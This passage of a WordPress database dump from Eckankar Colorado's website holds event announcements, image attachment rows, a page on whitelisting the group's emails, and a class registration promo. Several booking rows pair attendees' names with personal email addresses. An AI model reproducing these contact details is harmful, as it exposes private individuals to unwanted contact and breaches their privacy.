Soul?<br>\r\n<br>\r\n</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Would you like to understand your relationship with the Divine more fully?</span></strong></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this service is for you. You will gain a deeper understanding of your place in this world and your unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>How to Survive Spiritually in Our Times</em>, p. 261, </span></p>\r\n<p class=\"mb-4\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"> “<em>This will sound like heresy, but one of the secrets of spiritual doctrine is that God learns through you, or through the experiences of Soul. God creates Soul, creates the place where Soul can have all these experiences, and then watches to see what Souls learn as they run around in this world with free will.</em>”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em> Please RSVP to get the Zoom link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'The Paradox of God\'<br>ECK Light and Sound Service - In Person & Online','','publish','closed','closed','','the-paradox-of-godeck-light-and-sound-service-in-person-online','','','2023-01-15 13:08:43','2023-01-15 20:08:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267730',0,'mec-events','',0),(267731,2,'2023-01-15 13:00:46','2023-01-15 20:00:46','','child-stairway-1','','inherit','closed','closed','','child-stairway-1','','','2023-01-15 13:00:46','2023-01-15 20:00:46','',267730,'https://eckankar-colorado.org/wp-content/uploads/2023/01/child-stairway-1.jpg',0,'attachment','image/jpeg',0),(267733,2,'2023-01-15 13:24:25','2023-01-15 20:24:25','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 16pt;\"><strong>What’s the key to overcoming fear?</strong></span></p>\r\n<p class=\"mb-4\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">*How looking at the past can help recognize the origin of fear</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">*Letting go of fear by surrendering to the Holy Spirit</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">*Dealing with fear during times of change</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are warmly invited to join in this spiritual discussion. We will be using exercises to help you gain awareness of God’s hand in your daily existence. The evening will include contemplation and discussion on how Spirit is always with you to help create the life you want to live.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, ECKANKAR: Ancient Wisdom for Today,</span></p>\r\n<p class=\"mb-4\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">“<em>When you let God into your life, divine love also enters. Experiences and coincidences you would have discounted as trivial before now become miraculous. Life itself is rich, and you discover the joy of service and charity. God’s love awakens your heart</em>.”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection: <a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span><br>\r\n<span style=\"font-size: 14pt;\">For more info and more events: <a class=\"text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Colorado Website</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/290921666/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Conquering Fear by Living Each Day in Love\'<br>Meetup - In Person','','publish','closed','closed','','conquering-fear-by-living-each-day-in-lovemeetup-in-person','','','2023-01-15 13:38:41','2023-01-15 20:38:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267733',0,'mec-events','',0),(267734,2,'2023-01-15 13:23:25','2023-01-15 20:23:25','','heart-in-hand-zoom','','inherit','closed','closed','','heart-in-hand-zoom','','','2023-01-15 13:23:25','2023-01-15 20:23:25','',267733,'https://eckankar-colorado.org/wp-content/uploads/2023/01/heart-in-hand-zoom.jpg',0,'attachment','image/jpeg',0),(267737,0,'2023-01-17 11:34:58','2023-01-17 18:34:58','','','','publish','closed','closed','','267737','','','2023-01-17 11:34:58','2023-01-17 18:34:58','',0,'https://eckankar-colorado.org/nf_sub/267737/',0,'nf_sub','',0),(267762,0,'2023-01-26 16:36:53','2023-01-26 23:36:53','','','','publish','closed','closed','','267762','','','2023-01-26 16:36:53','2023-01-26 23:36:53','',0,'https://eckankar-colorado.org/nf_sub/267762/',0,'nf_sub','',0),(267740,0,'2023-01-21 07:17:42','2023-01-21 14:17:42','','','','publish','closed','closed','','267740','','','2023-01-21 07:17:42','2023-01-21 14:17:42','',0,'https://eckankar-colorado.org/nf_sub/267740/',0,'nf_sub','',0),(267741,1000057,'2023-01-22 10:30:00','2023-01-22 17:30:00','','Paul Hanson - azpaulfh@aol.com','','publish','closed','closed','','paul-hanson-azpaulfhaol-com-2','','','2023-01-22 10:30:00','2023-01-22 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267741',0,'mec-books','',0),(267742,1000065,'2023-01-22 10:30:00','2023-01-22 17:30:00','','Lisa Gage - Lisa1lg@aol.com','','publish','closed','closed','','lisa-gage-lisa1lgaol-com','','','2023-01-22 10:30:00','2023-01-22 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267742',0,'mec-books','',0),(267743,1000066,'2023-01-22 10:30:00','2023-01-22 17:30:00','','Chris Gage - christo990@aol.com','','publish','closed','closed','','chris-gage-christo990aol-com','','','2023-01-22 10:30:00','2023-01-22 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267743',0,'mec-books','',0),(267744,0,'2023-01-22 08:24:58','2023-01-22 15:24:58','','','','publish','closed','closed','','267744','','','2023-01-22 08:24:58','2023-01-22 15:24:58','',0,'https://eckankar-colorado.org/nf_sub/267744/',0,'nf_sub','',0),(267745,1000062,'2023-01-22 10:30:00','2023-01-22 17:30:00','','Lexi - alexareevesmassey@gmail.com','','publish','closed','closed','','lexi-alexareevesmasseygmail-com-2','','','2023-01-22 10:30:00','2023-01-22 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267745',0,'mec-books','',0),(267746,0,'2023-01-22 11:37:53','2023-01-22 18:37:53','','','','publish','closed','closed','','267746','','','2023-01-22 11:37:53','2023-01-22 18:37:53','',0,'https://eckankar-colorado.org/nf_sub/267746/',0,'nf_sub','',0),(267747,0,'2023-01-22 11:38:50','2023-01-22 18:38:50','','','','publish','closed','closed','','267747','','','2023-01-22 11:38:50','2023-01-22 18:38:50','',0,'https://eckankar-colorado.org/nf_sub/267747/',0,'nf_sub','',0),(267748,0,'2023-01-22 12:34:55','2023-01-22 19:34:55','','','','publish','closed','closed','','267748','','','2023-01-22 12:34:55','2023-01-22 19:34:55','',0,'https://eckankar-colorado.org/nf_sub/267748/',0,'nf_sub','',0),(268155,0,'2023-03-04 15:12:14','2023-03-04 22:12:14','','','','publish','closed','closed','','268155','','','2023-03-04 15:12:14','2023-03-04 22:12:14','',0,'https://eckankar-colorado.org/nf_sub/268155/',0,'nf_sub','',0),(268156,0,'2023-03-04 15:15:18','2023-03-04 22:15:18','','','','publish','closed','closed','','268156','','','2023-03-04 15:15:18','2023-03-04 22:15:18','',0,'https://eckankar-colorado.org/nf_sub/268156/',0,'nf_sub','',0),(269243,0,'2023-10-21 16:19:53','2023-10-21 22:19:53','','','','publish','closed','closed','','269243','','','2023-10-21 16:19:53','2023-10-21 22:19:53','',0,'https://eckankar-colorado.org/nf_sub/269243/',0,'nf_sub','',0),(267760,0,'2023-01-24 12:40:35','2023-01-24 19:40:35','','','','publish','closed','closed','','267760','','','2023-01-24 12:40:35','2023-01-24 19:40:35','',0,'https://eckankar-colorado.org/nf_sub/267760/',0,'nf_sub','',0),(267761,0,'2023-01-25 10:10:54','2023-01-25 17:10:54','','','','publish','closed','closed','','267761','','','2023-01-25 10:10:54','2023-01-25 17:10:54','',0,'https://eckankar-colorado.org/nf_sub/267761/',0,'nf_sub','',0),(267763,0,'2023-01-28 19:52:26','2023-01-29 02:52:26','','','','publish','closed','closed','','267763','','','2023-01-28 19:52:26','2023-01-29 02:52:26','',0,'https://eckankar-colorado.org/nf_sub/267763/',0,'nf_sub','',0),(267764,0,'2023-01-29 11:20:47','2023-01-29 18:20:47','','','','publish','closed','closed','','267764','','','2023-01-29 11:20:47','2023-01-29 18:20:47','',0,'https://eckankar-colorado.org/nf_sub/267764/',0,'nf_sub','',0),(267766,2,'2023-02-01 15:38:20','2023-02-01 22:38:20','<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-gallery-10 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<p class=\"\" style=\"text-align: center;\"><img class=\"alignnone wp-image-267865 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/email-whitelist-2.jpg\" alt=\"\" width=\"1080\" height=\"427\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 16px; padding-bottom: 33px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<p class=\"h1\" style=\"text-align: center; text-transform: capitalize; border-width: 0px; color: rgba(62, 62, 62, 0.9); font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"color: #1d5791;\">Not Receiving Emails From Colorado Eckankar?</span></p>\r\n<p class=\"\" style=\"border-width: 0px; text-align: center; color: #333333; font-size: 20px;\">We recommend that you whitelist our domain in your email account. Whitelisting us, or adding us to your safe sender list will ensure that your email provider doesn\'t block any emails that come from us!</p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"bg-hr\" style=\"border: 2px solid; margin-right: auto; margin-left: auto; color: #23507d;\" width=\"75%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 16px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">After we send you an email, it must pass through several spam checking procedures that are controlled by your email provider. Email providers have developed extensive spam filtering techniques to monitor all emails in an effort to keep the recipients inbox free from spam.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 16px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">However, these filtering methods used by Gmail, Yahoo, Outlook, etc., often mistakenly block legitimate messages and may route them to your spam folder or not deliver them at all. By whitelisting our ECKANKAR email addresses or domain, your email provider will see that these messages are important to you and they should be delivered to your inbox.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 16px; font-weight: 500; font-family: \'Open Sans\';\" data-font-weight=\"500\" data-font-family=\"Open Sans\" data-font-style=\"\">Please find your email provider from the list below and click on it to see instructions on how to whitelist the Eckankar in Colorado emails.</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 60px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<p class=\"\" style=\"border-width: 0px;\">[WPSM_AC id=267776]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Email Whitelisting- working','','publish','closed','closed','','email-whitelisting-working','','','2023-02-15 13:18:40','2023-02-15 20:18:40','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267766',0,'bg_block','',0),(267767,2,'2023-01-30 15:29:01','2023-01-30 22:29:01','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483','','','2023-01-30 15:29:01','2023-01-30 22:29:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483.jpg',0,'attachment','image/jpeg',0),(267768,2,'2023-01-30 15:29:01','2023-01-30 22:29:01','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f','','','2023-01-30 15:29:01','2023-01-30 22:29:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f.jpg',0,'attachment','image/jpeg',0),(267769,2,'2023-01-30 15:29:02','2023-01-30 22:29:02','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac','','','2023-01-30 15:29:02','2023-01-30 22:29:02','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac.jpg',0,'attachment','image/jpeg',0),(267815,2,'2023-02-03 10:48:07','2023-02-03 17:48:07','','co-ek-logo-title-2023','','inherit','closed','closed','','co-ek-logo-title-2023','','','2023-02-03 10:48:07','2023-02-03 17:48:07','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/co-ek-logo-title-2023.png',0,'attachment','image/png',0),(267771,2,'2023-01-30 15:29:02','2023-01-30 22:29:02','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557','','','2023-01-30 15:29:02','2023-01-30 22:29:02','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557.jpg',0,'attachment','image/jpeg',0),(267774,2,'2023-01-30 15:35:30','2023-01-30 22:35:30','','email-whitelist-1','','inherit','closed','closed','','email-whitelist-1','','','2023-01-30 15:35:30','2023-01-30 22:35:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/01/email-whitelist-1.jpg',0,'attachment','image/jpeg',0),(267776,2,'2023-01-31 20:40:24','2023-02-01 03:40:24','','<span style=\"color:rgba(62,62,62,0.9); font-family: \'Open Sans\'; font-size: 28px; text-transform: capitalize;\">How To Whitelist Emails</span>','','publish','closed','closed','','email-whitelist','','','2023-09-04 16:03:45','2023-09-04 22:03:45','',0,'https://eckankar-colorado.org/?post_type=responsive_accordion&#038;p=267776',0,'responsive_accordion','',0),(267781,2,'2023-01-31 21:31:56','2023-02-01 04:31:56','{{unknown}}','','','publish','closed','closed','','36c421be6d891b4a6fad366d71bd0282','','','2023-01-31 21:31:56','2023-02-01 04:31:56','',0,'https://eckankar-colorado.org/36c421be6d891b4a6fad366d71bd0282/',0,'oembed_cache','',0),(267786,2,'2023-02-01 14:26:03','2023-02-01 21:26:03','','gmail-01','','inherit','closed','closed','','gmail-01','','','2023-02-01 14:26:03','2023-02-01 21:26:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-01.jpg',0,'attachment','image/jpeg',0),(267787,2,'2023-02-01 14:26:48','2023-02-01 21:26:48','','gmail-1','','inherit','closed','closed','','gmail-1','','','2023-02-01 14:26:48','2023-02-01 21:26:48','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-1.jpg',0,'attachment','image/jpeg',0),(267788,2,'2023-02-01 14:28:55','2023-02-01 21:28:55','','gmail-2','','inherit','closed','closed','','gmail-2','','','2023-02-01 14:28:55','2023-02-01 21:28:55','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-2.jpg',0,'attachment','image/jpeg',0),(267789,2,'2023-02-01 14:31:45','2023-02-01 21:31:45','','gmail-3','','inherit','closed','closed','','gmail-3','','','2023-02-01 14:31:45','2023-02-01 21:31:45','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-3.jpg',0,'attachment','image/jpeg',0),(267790,2,'2023-02-01 14:32:44','2023-02-01 21:32:44','','gmail-4','','inherit','closed','closed','','gmail-4','','','2023-02-01 14:32:44','2023-02-01 21:32:44','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-4.jpg',0,'attachment','image/jpeg',0),(267792,2,'2023-02-01 14:45:48','2023-02-01 21:45:48','','gmail-01B','','inherit','closed','closed','','gmail-01b','','','2023-02-01 14:45:48','2023-02-01 21:45:48','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-01B.jpg',0,'attachment','image/jpeg',0),(267793,2,'2023-02-01 15:28:12','2023-02-01 22:28:12','','outlook-1','','inherit','closed','closed','','outlook-1','','','2023-02-01 15:28:12','2023-02-01 22:28:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-1.jpg',0,'attachment','image/jpeg',0),(267794,2,'2023-02-01 15:30:32','2023-02-01 22:30:32','','outlook-2','','inherit','closed','closed','','outlook-2','','','2023-02-01 15:30:32','2023-02-01 22:30:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-2.jpg',0,'attachment','image/jpeg',0),(267865,2,'2023-02-03 21:32:04','2023-02-04 04:32:04','','email-whitelist-2','','inherit','closed','closed','','email-whitelist-2','','','2023-02-03 21:32:04','2023-02-04 04:32:04','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/email-whitelist-2.jpg',0,'attachment','image/jpeg',0),(267799,2,'2023-02-01 21:09:35','2023-02-02 04:09:35','','comcast-1a','','inherit','closed','closed','','comcast-1a','','','2023-02-01 21:09:35','2023-02-02 04:09:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-1a.jpg',0,'attachment','image/jpeg',0),(267800,2,'2023-02-01 21:10:40','2023-02-02 04:10:40','','comcast-2','','inherit','closed','closed','','comcast-2','','','2023-02-01 21:10:40','2023-02-02 04:10:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-2.jpg',0,'attachment','image/jpeg',0),(267801,2,'2023-02-01 21:13:32','2023-02-02 04:13:32','','comcast-3','','inherit','closed','closed','','comcast-3','','','2023-02-01 21:13:32','2023-02-02 04:13:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-3.jpg',0,'attachment','image/jpeg',0),(267802,2,'2023-02-01 21:15:37','2023-02-02 04:15:37','','comcast-4','','inherit','closed','closed','','comcast-4','','','2023-02-01 21:15:37','2023-02-02 04:15:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-4.jpg',0,'attachment','image/jpeg',0),(267803,2,'2023-02-01 21:18:20','2023-02-02 04:18:20','','comcast-3b','','inherit','closed','closed','','comcast-3b','','','2023-02-01 21:18:20','2023-02-02 04:18:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-3b.jpg',0,'attachment','image/jpeg',0),(267804,2,'2023-02-01 21:24:03','2023-02-02 04:24:03','','comcast-5','','inherit','closed','closed','','comcast-5','','','2023-02-01 21:24:03','2023-02-02 04:24:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-5.jpg',0,'attachment','image/jpeg',0),(267807,2,'2023-02-02 16:38:25','2023-02-02 23:38:25','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find your own proof of the love and power of HU.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more information about HU, check out&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/291290460/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current county guidelines for all in person events in Loveland, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Sound of Soul Event - In Person','','publish','closed','closed','','sound-of-soul-event-in-person','','','2023-02-02 16:40:25','2023-02-02 23:40:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267807',0,'mec-events','',0),(267809,2,'2023-02-02 16:53:36','2023-02-02 23:53:36','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Are you looking for ways to cope spiritually with the personal challenges?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you wonder what causes our problems and why?<br>\r\n</span><span style=\"font-size: 16pt;\">Can you see a problem as an opportunity in disguise?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this discussion will open new ways to find your own solutions to the challenges you are facing in your life.<br>\r\n<br>\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp in his book \"ECK Wisdom on Solving Problems\" says “A solution is hidden in the folds of every reverse. No matter what is thrown into our face, there is a way to roll with the punch. People with a high state of consciousness are not frozen into inaction by terror brought about through disasters. They immediately make a plan to turn the negative energy to advantage. At this level of creative imagination, Soul is in a condition of survival. The lesson of the worlds of matter is to develop Soul’s ability to ride the crests of life.”</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span><br>\r\n<span style=\"font-size: 14pt;\">Follow this link to find out more about <a href=\"https://www.eckankar.org\" target=\"_blank\" rel=\"noopener\">ECKANKAR</a><br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/290781605/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Wisdom on the Spiritual Nature of Problems<br>Meetup - In Person','','publish','closed','closed','','wisdom-on-the-spiritual-nature-of-problemsmeetup-in-person','','','2023-02-02 16:58:16','2023-02-02 23:58:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267809',0,'mec-events','',0),(267810,2,'2023-02-02 16:51:38','2023-02-02 23:51:38','','blue-butterfly-4','','inherit','closed','closed','','blue-butterfly-4','','','2023-02-02 16:51:38','2023-02-02 23:51:38','',267809,'https://eckankar-colorado.org/wp-content/uploads/2023/02/blue-butterfly-4.jpg',0,'attachment','image/jpeg',0),(269010,2,'2023-09-18 10:46:38','2023-09-18 16:46:38','<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK members who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','2023-2024-SATSANG REGISTRATION PROMO---WORKING -- For Member Page Only','','publish','closed','closed','','2023-2024-satsang-registration-promo-working-for-member-page-only','','','2023-09-18 